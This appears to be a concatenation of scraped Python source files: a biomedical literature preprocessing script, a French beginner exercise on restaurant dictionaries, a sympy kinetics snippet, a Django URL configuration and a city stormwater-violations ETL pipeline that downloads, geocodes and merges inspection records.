C:\\Users\\cmendezc\\Documents\\GENOMICAS\\AUTOMATIC_SUMMARIZATION_TFS\\corpus\\TF_PMIDs_TXT_ECK120011394_FhlA\\original --outputPath C:\\Users\\cmendezc\\Documents\\GENOMICAS\\AUTOMATIC_SUMMARIZATION_TFS\\corpus\\TF_PMIDs_TXT_ECK120011394_FhlA\\preprocessed --termPath C:\\Users\\cmendezc\\Documents\\GENOMICAS\\AUTOMATIC_SUMMARIZATION_TFS\\resources\\termLists --termFiles termFilesLength.json\n\n# MarA\n# python preprocessingTermDetection.py --inputPath C:\\Users\\cmendezc\\Documents\\GENOMICAS\\AUTOMATIC_SUMMARIZATION_TFS\\corpus\\TF_PMIDs_TXT_ECK120011412_MarA\\original --outputPath C:\\Users\\cmendezc\\Documents\\GENOMICAS\\AUTOMATIC_SUMMARIZATION_TFS\\corpus\\TF_PMIDs_TXT_ECK120011412_MarA\\preprocessed --termPath C:\\Users\\cmendezc\\Documents\\GENOMICAS\\AUTOMATIC_SUMMARIZATION_TFS\\resources\\termLists --termFiles termFilesLength.json\n\n# ArgR\n# python preprocessingTermDetection.py --inputPath C:\\Users\\cmendezc\\Documents\\GENOMICAS\\AUTOMATIC_SUMMARIZATION_TFS\\corpus\\TF_PMIDs_TXT_ECK120011670_ArgR\\original --outputPath C:\\Users\\cmendezc\\Documents\\GENOMICAS\\AUTOMATIC_SUMMARIZATION_TFS\\corpus\\TF_PMIDs_TXT_ECK120011670_ArgR\\preprocessed --termPath C:\\Users\\cmendezc\\Documents\\GENOMICAS\\AUTOMATIC_SUMMARIZATION_TFS\\resources\\termLists --termFiles termFilesLength.json\n\n# CytR\n# python preprocessingTermDetection.py --inputPath C:\\Users\\cmendezc\\Documents\\GENOMICAS\\AUTOMATIC_SUMMARIZATION_TFS\\corpus\\TF_PMIDs_TXT_ECK120012407_CytR\\original --outputPath C:\\Users\\cmendezc\\Documents\\GENOMICAS\\AUTOMATIC_SUMMARIZATION_TFS\\corpus\\TF_PMIDs_TXT_ECK120012407_CytR\\preprocessed --termPath C:\\Users\\cmendezc\\Documents\\GENOMICAS\\AUTOMATIC_SUMMARIZATION_TFS\\resources\\termLists --termFiles termFilesLength.json\n\n# Rob\n# python preprocessingTermDetection.py --inputPath C:\\Users\\cmendezc\\Documents\\GENOMICAS\\AUTOMATIC_SUMMARIZATION_TFS\\corpus\\TF_PMIDs_TXT_ECK120011190_Rob\\original --outputPath C:\\Users\\cmendezc\\Documents\\GENOMICAS\\AUTOMATIC_SUMMARIZATION_TFS\\corpus\\TF_PMIDs_TXT_ECK120011190_Rob\\preprocessed --termPath C:\\Users\\cmendezc\\Documents\\GENOMICAS\\AUTOMATIC_SUMMARIZATION_TFS\\resources\\termLists --termFiles termFilesLength.json\n\n# EXTRACTING REGULATORY INTERACTIONS\n# python preprocessingTermDetection.py\n# --inputPath C:\\Users\\cmendezc\\Documents\\GENOMICAS\\EXTRACTING_REGULATORY_INTERACTIONS\\corpus_ecoli\\original\n# --outputPath C:\\Users\\cmendezc\\Documents\\GENOMICAS\\EXTRACTING_REGULATORY_INTERACTIONS\\corpus_ecoli\\preprocessed\n# --termPath C:\\Users\\cmendezc\\Documents\\GENOMICAS\\preprocessingTermTagging_v1.0\\termLists\n# --termFiles termFilesLength.json\n\n# def addEndPeriod(cad):\n# if cad.endswith('.'):\n# return cad\n# else:\n# return cad + '.'\n\n\n###########################################################\n# MAIN PROGRAM #\n###########################################################\n\nif __name__ == \"__main__\":\n # Parameter definition\n parser = OptionParser()\n parser.add_option(\"--inputPath\", dest=\"inputPath\",\n help=\"Path to read input files\", metavar=\"PATH\")\n parser.add_option(\"--outputPath\", dest=\"outputPath\",\n help=\"Path to place output files\", metavar=\"PATH\")\n parser.add_option(\"--termPath\", dest=\"termPath\",\n help=\"Path of term files\", metavar=\"PATH\")\n parser.add_option(\"--termFiles\", dest=\"termFiles\",\n help=\"JSON file with terms files and length\", metavar=\"PATH\")\n parser.add_option(\"--termDetection\", default=False,\n action=\"store_true\", dest=\"termDetection\",\n help=\"Perform term detection?\")\n parser.add_option(\"--multiDocument\", default=False,\n action=\"store_true\", dest=\"multiDocument\",\n help=\"Processing multidocuments within input file?\")\n parser.add_option(\"--tabFormat\", default=False,\n action=\"store_true\", dest=\"tabFormat\",\n help=\"File with format PMID\\tNUMSENT\\tSENT\\tCLASS?\")\n parser.add_option(\"--joinPunctuation\", default=False,\n action=\"store_true\", dest=\"joinPunctuation\",\n help=\"Join separated punctuation?\")\n\n (options, args) = parser.parse_args()\n\n if len(args) > 0:\n parser.error(\"None parameters indicated.\")\n sys.exit(1)\n\n # Printing parameter values\n print('-------------------------------- PARAMETERS --------------------------------')\n print(\"Path to read input files: \" + str(options.inputPath))\n print(\"Path to place output files: \" + str(options.outputPath))\n print(\"Perform term detection?: \" + str(options.termDetection))\n if options.termDetection:\n print(\"Path to read terminological resources: \" + str(options.termPath))\n print(\"JSON file with terms files and length: \" + str(options.termFiles))\n print(\"Processing multidocuments within input file?: \" + str(options.multiDocument))\n print(\"File with format PMID\\tNUMSENT\\tSENT\\tCLASS?: \" + str(options.tabFormat))\n print(\"Join separated punctuation?: \" + str(options.joinPunctuation))\n\n # #### REGEX DEFINITION FOR UNNECESSARY LINES #####\n regexEmptyLine = re.compile('^\\s*$')\n # Copyright � 1997\n # © 1997 Elsevier\n # Copyright © 1998,\n # Keywords: GntR; cAMP-CRP; GntP family\n # Received 21 October 1996/Accepted 27 December 1996\n # Received 6 January 1997; accepted 5 June 1997; Received by A. Nakazawa\n # (Received 29 June 1998/Accepted 3 August 1998)\n # * Corresponding author. Mailing address: Department of Microbiology,\n # Phone: (614) 688-3518.\n # Fax: (614) 688-3519.\n # E-mail: conway.51@osu.edu.\n # Downloaded from\n # www.sciencedirect.com Current Opinion in Microbiology 2008, 11:87–93\f88 Cell regulation\n # DOI 10.1016 / j.mib .2008.02.007\n # Correspondence to J\n\n # journal homepage: www.elsevier.com/locate/biotechadv\n # Research review paper\n # Article history:\n # Accepted 18 April 2014\n # Available online 26 April 2014\n # Abbreviations : ROS ,\n # JOURNAL OF\n # 0021-9193/02\n\n # Mailing address : CSIC - Estación Experimental del Zaidín , Apdo .\n # Correos 419 , E - 18008 Granada , Spain .\n # Phone : 34 - 58 - 121011 .\n # Fax : 34 - 58 - 129600 .\n # Present address : Department of Biology , Imperial College of Science ,\n\n expression = '^(Copyright|© [0-9][0-9][0-9][0-9]|Keywords:|\\(?Received [0-9]?[0-9]|\\*?\\s?Corresponding author|' + \\\n 'Phone:|Fax:|E-mail:|Phone\\s:|Fax\\s:|E-mail\\s:|Mailing\\saddress\\s:|Present\\saddress\\s:|' + \\\n 'Downloaded\\sfrom|DOI|www\\.sciencedirect\\.com|Correspondence to [A-ZÁÉÍÓÚÀÈÌÒÙÂÊÎÔÛ]|' + \\\n 'journal homepage:|Research review paper|Article history:|\\(?Accepted [0-9]?[0-9]|' + \\\n 'Available online|Abbreviations:|ACKNOWLEDGMENTS\\s|REFERENCES\\s|' + \\\n 'All rights reserved|Published by Elsevier|' + \\\n 'Verbatim copying and redistribution of this article|J Bacteriol [0-9][0-9][0-9][0-9]|' + \\\n 'Mol Microbiol [0-9][0-9][0-9][0-9]|Nucleic Acids Res [0-9][0-9][0-9][0-9]|' + \\\n 'JOURNAL OF|[0-9][0-9][0-9][0-9]\\-[0-9][0-9][0-9]/[0-9][0-9]|[0-9][0-9][0-9] – [0-9][0-9][0-9] Vol)'\n regexUnnecessaryLines = re.compile(expression)\n #regexUnnecessaryLines = re.compile('^(Copyright)')\n # REFERENCES: Eisenberg, R.C., Dobrogosz, W.J., 1967\n # Hung, A., Orozco, A., Zwaig, N., 1970.\n # Shine, J. & Dalgarno, L. (1974).\n # 34. Saier, M. H., T. M. Ramseier, and J. Reizer. 1996.\n # 1. Pesavento, C. & Hengge, R. Bacterial nucleotide-based\n # Battesti , N .\n # Aiba , H . , T .\n # Yamamoto , and M .\n # regexReferences = re.compile('^([0-9]?[0-9]\\.\\s)?[A-ZÁÉÍÓÚÀÈÌÒÙÂÊÎÔÛ][a-záéíóúàèìòùüâêîôû\\-]+\\s?,\\s([A-ZÁÉÍÓÚÀÈÌÒÙÂÊÎÔÛ]\\s?\\.\\s?)+.*([0-9][0-9][0-9][0-9])')\n # regexReferences = re.compile('^([0-9]?[0-9]\\.\\s)?[A-ZÁÉÍÓÚÀÈÌÒÙÂÊÎÔÛ][a-záéíóúàèìòùüâêîôû\\-]+\\s?,\\s([A-ZÁÉÍÓÚÀÈÌÒÙÂÊÎÔÛ]\\s?\\.\\s?)+')\n regexReferences = re.compile('^([0-9]?[0-9]\\.\\s)?[A-ZÁÉÍÓÚÀÈÌÒÙÂÊÎÔÛ][a-záéíóúàèìòùüâêîôû\\-]+\\s?,\\s([A-ZÁÉÍÓÚÀÈÌÒÙÂÊÎÔÛ]\\s?\\.\\s?)+($|.*\\(\\s?[0-9][0-9][0-9][0-9]\\s?\\))')\n # Lines without words, with only symbols\n # --.-,.;....a...........c....\n # .........\n # 2.;\n # ..~......: ........................\n # ::..:.< -.;-.:.;L.:.5 %..-.-...;..;..,:\n # ?........., .....,: ........,,::, , ...\n # ..\n # .J\n # L,.\n # 2\n # i\n # regexLinesNoText = re.compile('^[^a-zA-Z0-9]')\n\n # regexUnderscoreWord = re.compile(r'\\b_\\b')\n\n # 40 o more dots which appear in index lines\n regexIndexLine = re.compile('\\.{40}')\n\n # e-mails\n regexEmail = re.compile(\n '(e-mail : |e-mail: |e-mail )?([a-zA-Z0-9\\._\\-]+@[a-zA-Z0-9\\-]+\\.[a-zA-Z0-9\\-]+\\.[a-zA-Z0-9\\-]+ |[a-zA-Z0-9\\._\\-]+@[a-zA-Z0-9\\-]+\\.[a-zA-Z0-9\\-]+\\.[a-zA-Z0-9\\-]+\\.[a-zA-Z0-9\\-]+ )')\n\n ### DETECTAR CONTENTS Y ELIMINAR HASTA INTRODUCTION (?): Overview of oxidative stress response ... ... 28 2 .\n ### SI ES INTRODUCTION, AKNOLEDGMENTS U OTRO TÍTULO, PONERLE PUNTO O ELIMINARLO SI ES A INICIO DE PALABRA Y NO HAY OTRO PALABRA DESPUÉS.\n # A VECES SE USA Summary\n\n # Join separated punctuation\n if options.joinPunctuation:\n # 1) join to right: (, [, “, ‘, ±, ~\n regexPuncRigth = re.compile('(?P[\\(\\[“‘±~])\\s')\n # 2) join to left: ), ], ., ,, ”, ´, ;, %, :, ’, '\n regexPuncLeft = re.compile('\\s(?P[\\)\\]\\.,”´;%:’\\'])')\n # 3) join both sides: -, /, –, —\n regexPuncBoth = re.compile('\\s(?P[-/–—])\\s')\n # 4) genitive: ArgP ’ s\n regexPuncGenitive = re.compile('(?P[a-zA-Z])\\s’\\ss\\s')\n\n # #### LOADING BIOLOGICAL TERM FILES #####\n if options.termDetection:\n with open(os.path.join(options.termPath, options.termFiles)) as data_file:\n lists = json.load(data_file)\n\n listTermFiles = lists[\"listTermFiles\"]\n listTerms = lists[\"listTerms\"]\n\n for key in listTermFiles.keys():\n for f in listTermFiles[key]:\n with open(os.path.join(options.termPath, f), \"r\", encoding=\"utf-8\", errors=\"replace\") as iFile:\n for line in iFile:\n line = line.strip('\\n')\n if line not in listTerms[key]:\n listTerms[key].append(line)\n print(' Terms read {} size: {}'.format(key, len(listTerms[key])))\n\n filesProcessed = 0\n t0 = time()\n print(\"Preprocessing files...\")\n # Walk directory to read files\n for path, dirs, files in os.walk(options.inputPath):\n # For each file in dir\n for file in files:\n if file.endswith('.txt'):\n print(\" Preprocessing file...\" + str(file))\n text = ''\n listSentences = []\n references = 0\n with open(os.path.join(path, file), \"r\", encoding=\"utf-8\", errors=\"replace\") as iFile:\n # Create output file to write\n # with open(os.path.join(options.outputPath, file.replace('.txt', '.pre.txt')), \"w\", encoding=\"utf-8\") as oFile:\n for line in iFile:\n originalLine = line.strip('\\n')\n if options.joinPunctuation:\n originalLine = regexPuncGenitive.sub(r'\\g’s', originalLine)\n originalLine = regexPuncRigth.sub(r'\\g', originalLine)\n originalLine = regexPuncLeft.sub(r'\\g', originalLine)\n originalLine = regexPuncBoth.sub(r'\\g', originalLine)\n if options.tabFormat:\n listLine = originalLine.split('\\t')\n line = listLine[2]\n ### DETECTAR AKNOWLEDGMENTS Y ELIMINAR TODO LO QUE SIGA\n # This eliminate usefull part of pepers if line.upper().startswith('ACKNOWLEDGMENT') or line.upper().startswith('REFERENCES') or references > 2:\n if not options.multiDocument:\n if line.upper() == 'ACKNOWLEDGMENTS' or line.upper() == 'REFERENCES' or references > 2:\n break\n # if line == '' or line == None:\n #if regexEmptyLine.match(line) != None:\n # print('Empty line ' + line)\n # continue\n #if regexReferences.match(line) != None:\n # print('Reference line ' + str(line.encode(encoding='UTF-8', errors='replace')))\n # references += 1\n # continue\n # if regexUnnecessaryLines.match(line) != None:\n #if regexUnnecessaryLines.search(line) != None:\n # print('Unnecessary line ' + str(line.encode(encoding='UTF-8', errors='replace')))\n # continue\n #if regexIndexLine.search(line) != None:\n # print('Index line ' + line)\n # continue\n #if regexEmail.search(line) != None:\n # print('Line with email: ' + line)\n # line = regexEmail.sub(' ', line)\n # print(line)\n\n text += originalLine + '\\n'\n\n if options.termDetection:\n # #### BIOLOGICAL TERM DETECTION #####\n print(' Detecting biological terms...')\n for key in sorted(listTerms.keys(), reverse=True):\n #print(' length: ' + str(key))\n for term in listTerms[key]:\n #print(str(term.encode(encoding='UTF-8', errors='replace')))\n text = text.replace(term, term.replace(' ', '-'))\n #regexTerm = re.compile(r'' + term)\n #regexTerm.sub(term.replace(' ', '_TERM_'), text)\n\n filesProcessed += 1\n with open(os.path.join(options.outputPath, file.replace(' ', '').replace('.txt', '.pre.txt')), \"w\", encoding=\"utf-8\") as oFile:\n oFile.write(text)\n\n # Imprime archivos procesados\n print()\n print(\"Files preprocessed: \" + str(filesProcessed))\n print(\"In: %fs\" % (time() - t0))\n","sub_path":"summarizer/preprocessingTermDetection.py","file_name":"preprocessingTermDetection.py","file_ext":"py","file_size_in_byte":17364,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"97"} +{"seq_id":"121976480","text":"#!/usr/bin/python3\n# coding: utf-8\n\n\ndef affRestos():\n global lesRestos\n\n for unResto in lesRestos:\n if unResto['ouvert'] == True:\n libelleOuverture = 'ouvert'\n else:\n libelleOuverture = 'fermé'\n print( '{0} : {1}\\t{2}'.format( unResto['arrdt'] , unResto['nom'] , libelleOuverture ) )\n\n\ndef getUnResto( nom ) :\n global lesRestos\n\n leResto = None\n\n i = 0\n while i < len( lesRestos ) and leResto == None :\n if lesRestos[ i ][ 'nom' ] == nom :\n leResto = lesRestos[ i ]\n else :\n i = i + 1\n\n return leResto\n\n\ndef ouvrirUnResto( nom ) :\n global lesRestos\n\n # Votre code ici - Exercice 6\n\n\nif __name__ == '__main__':\n lesRestos = [\n\n {'nom': 'Hao Long', 'arrdt': 1, 'ouvert': True, 'spec': 'chinois'},\n {'nom': 'A Casaluna', 'arrdt': 1, 'ouvert': True, 'spec': 'corse'},\n {'nom': 'Le Pot de Vins', 'arrdt': 1, 'ouvert': False, 'spec': 'français'},\n {'nom': 'Comptoir Montevideo', 'arrdt': 1, 'ouvert': False, 'spec': 'latino'},\n {'nom': 'Carrousel Français', 'arrdt': 1, 'ouvert': True, 'spec': 'français'},\n {'nom': 'Mumi', 'arrdt': 1, 'ouvert': True, 'spec': 'français'},\n {'nom': 'L\\'Atelier du Tartare', 'arrdt': 1, 'ouvert': True, 'spec': 'français'},\n {'nom': 'Lobster Bar', 'arrdt': 1, 'ouvert': False, 'spec': 'américain'},\n {'nom': 'Sequana', 'arrdt': 1, 'ouvert': True, 'spec': 'français'},\n {'nom': 'Autour du Saumon Convention', 'arrdt': 15, 'ouvert': True, 'spec': 'scandinave'},\n {'nom': 'Chez Marc', 'arrdt': 15, 'ouvert': True, 'spec': 'libanais'},\n {'nom': 'Jeongané', 'arrdt': 15, 'ouvert': True, 'spec': 'coréen'},\n {'nom': 'Neige d\\'été', 'arrdt': 15, 'ouvert': True, 'spec': 'fusion'},\n {'nom': 'Le Caroubier', 'arrdt': 15, 'ouvert': True, 'spec': 'marocain'},\n {'nom': 'Le Quinzième', 'arrdt': 15, 'ouvert': False, 'spec': 'français'},\n {'nom': 'Ristorantino Shardana', 'arrdt': 15, 'ouvert': False, 'spec': 'italien'},\n {'nom': 'Hanaza', 'arrdt': 15, 'ouvert': True, 'spec': 'japonais'},\n {'nom': 'Tipaza', 'arrdt': 15, 'ouvert': True, 'spec': 'marocain'},\n {'nom': 'Le Palais de Shah Jahan', 'arrdt': 15, 'ouvert': False, 'spec': 'indien'},\n {'nom': 'La Table Libanaise', 'arrdt': 15, 'ouvert': True, 'spec': 'libanais'},\n {'nom': 'Terres du Sud', 'arrdt': 15, 'ouvert': True, 'spec': 'latino'},\n {'nom': 'Sagarmatha', 'arrdt': 15, 'ouvert': True, 'spec': 'libanais'},\n {'nom': 'Lakou', 'arrdt': 15, 'ouvert': True, 'spec': 'asiatique'}\n\n ]\n\n print( '--- Avant ouverture du restaurant Lobster Bar ---\\n' )\n affRestos()\n\n ouvrirUnResto( 'Lobster Bar' )\n\n print( '\\n\\n--- Après ouverture du restaurant Lobster Bar ---\\n' )\n affRestos()\n","sub_path":"TesterOuvrirUnResto.py","file_name":"TesterOuvrirUnResto.py","file_ext":"py","file_size_in_byte":2855,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"97"} +{"seq_id":"302818937","text":"from sympy import *\n\nT = 1.000000e+03\nt = symbols(\"t\")\nA, B = symbols(\"A B\", function=True)\n\nr0 = 1.000000e+00*A(t)\n\neq1 = Eq(Derivative(A(t), t) + r0)\neq2 = Eq(Derivative(B(t), t) - r0)\n\neq = (eq1, eq2)\nsol = dsolve(eq)\n\nprint(sol)\n","sub_path":"python/sympy/kinetics/mechanism-equations-keep-0.py","file_name":"mechanism-equations-keep-0.py","file_ext":"py","file_size_in_byte":233,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"97"} +{"seq_id":"115627074","text":"\"\"\"foodstorage URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/1.9/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.conf.urls import url, include\n 2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))\n\"\"\"\nfrom django.conf import settings\nfrom django.conf.urls import url, include\nfrom django.conf.urls.static import static\nfrom django.contrib import admin\nfrom rest_framework.authtoken import views\n\nfrom .views import IndexAPI\n\n\nurlpatterns = [\n url(r'^admin/', admin.site.urls),\n\n url(r'^auth/', views.obtain_auth_token, name='auth'),\n\n url(r'^$', IndexAPI.as_view(), name='index'),\n url(r'^users/', include('users.urls')),\n url(r'^photos/', include('photos.urls')),\n url(r'^ratings/', include('ratings.urls')),\n]\n\nurlpatterns.extend(\n static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)\n)\nurlpatterns.extend(\n static(settings.STATIC_URL, document_root=settings.STATIC_ROOT)\n)\n\nif settings.DEBUG:\n urlpatterns.append(\n url(\n r'^api-auth/',\n include('rest_framework.urls', namespace='rest_framework')\n )\n )","sub_path":"foodstorage/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1522,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"97"} +{"seq_id":"76698999","text":"\"\"\"_jobs file for tsw_integration.\"\"\"\nimport os\nimport pandas as pd\nimport geopandas as gpd\nimport logging\nimport string\nimport glob\nimport numpy as np\nfrom shapely.geometry import Point\nfrom trident.util import general\nfrom trident.util import geospatial\nfrom trident.util.sf_client import Salesforce\nfrom airflow.hooks.postgres_hook import PostgresHook\nimport cx_Oracle\n\n\nconf = general.config\ncredentials = general.source['dsd_permits']\n\ntemp_file_sf = conf['temp_data_dir'] + '/tsw_violations_sf_temp.csv'\ntemp_file_pts = conf['temp_data_dir'] + '/tsw_violations_pts_temp.csv'\ntemp_file_vpm = conf['temp_data_dir'] + '/tsw_violations_vpm_temp.csv'\nprod_file_geojson = conf['prod_data_dir'] + '/stormwater_violations_merged.geojson'\nprod_file_csv = conf['prod_data_dir'] + '/stormwater_violations_merged.csv'\nprod_file_csv_with_null_geos = conf['prod_data_dir'] + '/stormwater_violations_merged_null_geos.csv'\n\ndump_gz_file = \"sd_sw_daily_dump.tar.gz\"\ndump_sql_file = \"sd_daily_dump.sql\"\n\n## Name of file on FTP that containes the extracted CSV of VPM vios.\ndump_csv_file = \"tsw_violations_vpm_temp.csv\"\n\n# Global placeholder for ref file\ngeoref = None\n\ngeocoded_addresses = 'https://datasd-reference.s3.amazonaws.com/sw_viols_address_book.csv'\n\n\n# VPM RETRIEVAL SUPPORT METHODS\n\ndef get_vpm_violations_wget():\n \"\"\"Temporary placeholder method for generating a wget to retrieve violations\"\"\"\n\n command = \"\"\"\n rm -rf {} && wget -np --continue \\\n --user={} --password={} \\\n --directory-prefix={} \\\n ftp://ftp.datasd.org/uploads/virtual_pm/{}\n \"\"\".format(\n temp_file_vpm,\n conf['ftp_datasd_user'],\n conf['ftp_datasd_pass'],\n conf['temp_data_dir'],\n dump_csv_file)\n\n return command\n\n\n\n#def ftp_download_wget():\n# \"\"\"Download sql dump.\"\"\"\n#\n# command = \"\"\"\n# wget -np --continue \\\n# --user={} --password={} \\\n# --directory-prefix={} \\\n# ftp://ftp.datasd.org/uploads/virtual_pm/{}\n# \"\"\".format(conf['ftp_datasd_user'], conf['ftp_datasd_pass'], conf['temp_data_dir'], dump_gz_file)\n#\n# return command\n#\n#\n#def get_tar_command():\n# \"\"\"Extract sql dump.\"\"\"\n# command = \"tar -zxvf {}/{}\".format(conf['temp_data_dir'], dump_gz_file)\n# return command\n#\n#\n#\n#\n#def get_vpm_populate_sql():\n# \"\"\" Populate SQL for VPM by running the unzipped SQL query. \"\"\"\n# query = general.file_to_string(\"{}/{}\".format(conf['temp_data_dir'], dump_sql_file))\n# query = query.decode('UTF-8', errors='ignore')\n# query = query.encode('ascii', errors='ignore')\n# return query\n#\n#\n#\n### For when we have a db to query, hopefully this is how we query it.\n#def get_vpm_violations():\n# \"\"\" Gets violations from temporary mysql db \"\"\"\n# logging.info(\"Retrieving VPM Vios\")\n# pg_hook = PostgresHook(postgres_conn_id='VPM_TEMP')\n# sql = general.file_to_string('./sql/vpm.sql', __file__)\n# df = pg_hook.get_pandas_df(sql)\n# general.pos_write_csv(df, temp_file_vpm, date_format='%Y-%m-%dT%H:%M:%S%z')\n# return \"Successfully wrote {} records for vpm violations file\".format(\n# df.shape[0])\n\n# END VPM RETRIEVAL SUPPORT METHODS\n\n\ndef get_sf_violations():\n \"\"\"Get violations from sf, creates temp file.\"\"\"\n username = conf['dpint_sf_user']\n password = conf['dpint_sf_pass']\n security_token = conf['dpint_sf_token']\n\n report_id = \"00Ot0000000TPXC\"\n\n # Init salesforce client\n sf = Salesforce(username, password, security_token)\n\n # Pull dataframe\n logging.info('Pull report {} from SF'.format(report_id))\n\n df = sf.get_report_df(report_id)\n\n logging.info('Process report {} data.'.format(report_id))\n\n general.pos_write_csv(df, temp_file_sf, date_format='%Y-%m-%dT%H:%M:%S%z')\n\n return \"Successfully wrote {} records for tsw_sf violations file\".format(\n df.shape[0])\n\ndef get_pts_violations():\n \"\"\" Get violations from pts, creates temp file. \"\"\"\n logging.info('Downloading PTS violations.')\n\n wget_str = \"wget -np --continue \" \\\n + \"--user=$ftp_user \" \\\n + \"--password='$ftp_pass' \" \\\n + \"--directory-prefix=$temp_dir \" \\\n + \"ftp://ftp.datasd.org/uploads/dsd/stormwater/*Panda_Extract_STW_*.csv\"\n tmpl = string.Template(wget_str)\n command = tmpl.substitute(\n ftp_user=conf['ftp_datasd_user'],\n ftp_pass=conf['ftp_datasd_pass'],\n temp_dir=conf['temp_data_dir'])\n\n return command\n\ndef combine_violations():\n \"\"\"Combine violations from 3 different sources.\"\"\"\n\n ptsv = _clean_pts_violations()\n logging.info(\"Read {} violations from PTS\".format(ptsv.shape[0]))\n vpm = _clean_vpm_violations()\n logging.info(\"Read {} violations from VPM\".format(vpm.shape[0]))\n sfv = _clean_sf_violations()\n logging.info(\"Read {} violations from SFV\".format(sfv.shape[0]))\n\n vs = pd.concat([ptsv, sfv, vpm])\n #vs = pd.concat([ptsv, sfv])\n\n vs.ADDITIONAL_1 = vs.ADDITIONAL_1.astype(str)\n vs.ADDITIONAL_2 = vs.ADDITIONAL_2.astype(str)\n vs.ADDITIONAL_1 = vs.ADDITIONAL_1.apply(lambda x: ''.join(e for e in x if e.isalnum()))\n vs.ADDITIONAL_2 = vs.ADDITIONAL_2.apply(lambda x: ''.join(e for e in x if e.isalnum()))\n\n logging.info(\"There are {} total violations\".format(vs.shape[0]))\n\n vs = vs.fillna(value={'ADDRESS': '',})\n vs = vs.fillna(value={'PARCEL_APN': '',})\n\n add_book = pd.read_csv(geocoded_addresses,low_memory=False)\n \n logging.info(f\"Fixing {vs.loc[(vs.ADDRESS == '') | (vs.ADDRESS == 'nan')].shape[0]} missing addresses\")\n\n parcel_addresses = vs.apply(parcel_to_address,axis=1)\n parcel_add_df = pd.DataFrame(parcel_addresses)\n #parcel_addr_cols = [col for col in parcel_add_df.columns if 'addr' in col or 'stre' in col or 'suf' in col]\n logging.info(parcel_add_df.head())\n\n #vs['ADDRESS'] = parcel_addresses\n \n logging.info('Create geo id based on address for merging')\n \n vs['geo_id'] = vs['ADDRESS'].apply(lambda x: x.lower().replace(' ',''))\n \n add_merge = pd.merge(vs,\n add_book,\n how='left',\n left_on='geo_id',\n right_on='geo_id',\n indicator=True\n )\n\n add_merge['LAT'] = add_merge['lat']\n add_merge['LON'] = add_merge['lng']\n\n logging.info('Separating matches from unmatched')\n\n add_matched = add_merge[add_merge['_merge'] == 'both']\n add_unmatched = add_merge[add_merge['_merge'] == 'left_only']\n\n logging.info(\"There are {} non geocoded entries\".format(\n add_unmatched.shape[0]))\n\n if add_unmatched.empty:\n logging.info('Nothing to geocode')\n geocoded_all = add_matched.copy()\n else:\n geocode_dedupe = add_unmatched.copy()\n geocode_dedupe = geocode_dedupe.drop_duplicates(subset=['geo_id'])\n geocoder_results = geocode_dedupe.apply(get_violation_coords, axis=1)\n coords = geocoder_results.apply(pd.Series)\n geocode_dedupe['LAT'] = coords[0]\n geocode_dedupe['LON'] = coords[1]\n\n add_unmatched = add_unmatched.drop(['LAT','LON'],axis=1)\n \n geocoded = pd.merge(add_unmatched,\n geocode_dedupe[['geo_id','LAT','LON']],\n how='left',\n left_on='geo_id',\n right_on='geo_id'\n )\n logging.info(\"Concat addresses matched with address book and addresses geocoded\")\n geocoded_all = pd.concat([add_matched,geocoded],ignore_index=True,sort=False)\n logging.info(\"Adding new geocodes to address book\")\n add_book_adds = geocode_dedupe[['geo_id','LON','LAT']]\n add_book_adds = add_book_adds.rename(columns={'LAT':'lat','LON':'lng'})\n add_book_new = pd.concat([add_book,add_book_adds])\n add_book_new = add_book_new.drop_duplicates(subset=['geo_id'])\n add_book_new.to_csv(conf['prod_data_dir']+'/sw_viols_address_book.csv',index=False)\n \n geocoded_all = geocoded_all.drop(['_merge','geo_id','lat','lng'],axis=1)\n\n vs_full = geocoded_all.copy()\n\n # Lock down a separate csv\n vs_geo = geocoded_all[((geocoded_all.LON.notnull()) | (geocoded_all.LAT.notnull()))]\n vs_geo['COORD'] = list(zip(vs_geo.LON, vs_geo.LAT))\n vs_geo['COORD'] = vs_geo.COORD.apply(Point)\n vs_geo = gpd.GeoDataFrame(vs_geo, geometry='COORD')\n\n logging.info(\"Writing GeoJSON File.\")\n if os.path.isfile(prod_file_geojson):\n os.remove(prod_file_geojson)\n\n vs_geo.to_file(prod_file_geojson, driver=\"GeoJSON\")\n\n logging.info(\"Writing CSV File.\")\n vs_geo.to_csv(prod_file_csv)\n vs_full.to_csv(prod_file_csv_with_null_geos)\n\n return \"Successfully Merged and Wrote Files.\"\n\n\ndef _clean_pts_violations():\n \"\"\" Clean data coming in from PTS \"\"\"\n\n filename = conf['temp_data_dir'] + \"/*Panda_Extract_STW_*.csv\"\n list_of_files = glob.glob(filename)\n latest_file = max(list_of_files, key=os.path.getmtime)\n logging.info(f\"Reading in {latest_file}\")\n\n ptsv = pd.read_csv(latest_file,names=['INSP_ID',\n 'ASSESSOR_PARCEL_10',\n 'LATITUDE',\n 'LONGITUDE',\n 'STREET_ADDRESS',\n 'INSP_TYPE_ID',\n 'INSP_TYPE_NM',\n 'INSP_RESULT_ID',\n 'INSP_RESULT_NM',\n 'PERFORMED_END_DT',\n 'PROJ_TITLE',\n 'SCOPE',\n 'LOCATION_NOTE',\n 'CONSTRUCTION_NOTE'\n ],dtype={'LONGITUDE':np.float64,\n 'LATITUDE':np.float64,\n 'PARCEL_APN':str\n })\n\n ptsv['PARCEL_APN'] = ptsv.ASSESSOR_PARCEL_10\n ptsv['LON'] = ptsv.LONGITUDE\n ptsv['LAT'] = ptsv.LATITUDE\n ptsv['SRC'] = 'DSD_PTS'\n ptsv['TYPE'] = ptsv.INSP_TYPE_NM\n ptsv['STATUS'] = ptsv.INSP_RESULT_NM\n ptsv['UUID'] = (ptsv['SRC'] + '_' + ptsv['INSP_ID'].astype(str).str.replace('-', '_')).str.lower()\n ptsv['ADDRESS'] = ptsv['STREET_ADDRESS'].astype(str)\n ptsv['ISSUE_DATE'] = ptsv['PERFORMED_END_DT']\n 